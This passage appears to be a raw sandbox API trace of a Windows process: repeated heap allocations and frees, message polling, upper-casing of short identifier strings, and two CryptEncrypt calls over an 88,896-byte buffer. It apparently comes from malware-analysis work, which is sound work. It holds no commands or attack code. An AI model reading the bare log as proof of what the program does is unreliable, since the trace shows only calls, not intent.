wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0149.724] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.724] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0149.724] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.724] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0149.724] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.725] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73a10 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.725] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.725] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.725] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0149.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0149.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0149.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0149.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0149.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0149.726] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0149.726] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa510 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0149.726] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.726] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0149.727] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0149.727] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.727] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0149.728] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d5b88 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0149.729] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.730] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.730] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa360, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.731] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x15b38, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x15b40) returned 1 [0149.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.862] CharLowerBuffW (in: lpsz="byte[88896]", cchLength=0xb | out: lpsz="byte[88896]") returned 0xb [0149.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.865] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.865] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.865] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.865] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0149.867] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0149.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0149.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0149.867] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d5b88*, pdwDataLen=0x8cef60*=0x15b38, dwBufLen=0x15b40 | out: pbData=0x37d5b88*, pdwDataLen=0x8cef60*=0x15b40) returned 1 [0149.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0149.871] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0149.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.871] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0149.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.871] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.871] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0149.871] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.872] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0149.872] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.872] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.872] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.872] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.872] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0149.872] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 